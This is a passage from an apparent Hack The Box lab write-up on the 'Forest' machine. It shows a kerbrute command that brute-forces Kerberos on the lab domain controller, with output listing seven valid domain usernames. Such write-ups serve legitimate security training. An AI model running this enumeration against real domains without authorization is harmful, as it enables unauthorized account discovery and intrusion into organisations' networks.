Kerberos
Nmap discovered a Kerberos service running over the target port 88
and 464
Username enumeration
Given the fact that I don’t have any credential, I can aim to enumerate some valid domain username by brute-forcing the Kerberos service.
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ kerbrute userenum --dc $IP -d htb.local /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/22/23 - Ronnie Flathers @ropnop
2023/01/22 13:01:34 > Using KDC(s):
2023/01/22 13:01:34 > 10.10.10.161:88
2023/01/22 13:01:34 > [+] VALID USERNAME: mark@htb.local
2023/01/22 13:01:34 > [+] VALID USERNAME: andy@htb.local
2023/01/22 13:01:37 > [+] VALID USERNAME: forest@htb.local
2023/01/22 13:01:39 > [+] VALID USERNAME: administrator@htb.local
2023/01/22 13:01:49 > [+] VALID USERNAME: sebastien@htb.local
2023/01/22 13:02:08 > [+] VALID USERNAME: santi@htb.local
2023/01/22 13:02:12 > [+] VALID USERNAME: lucinda@htb.local
Kerbrute identified a total of 7 valid domain users:
mark
andy
forest
administrator
sebastien
santi
lucinda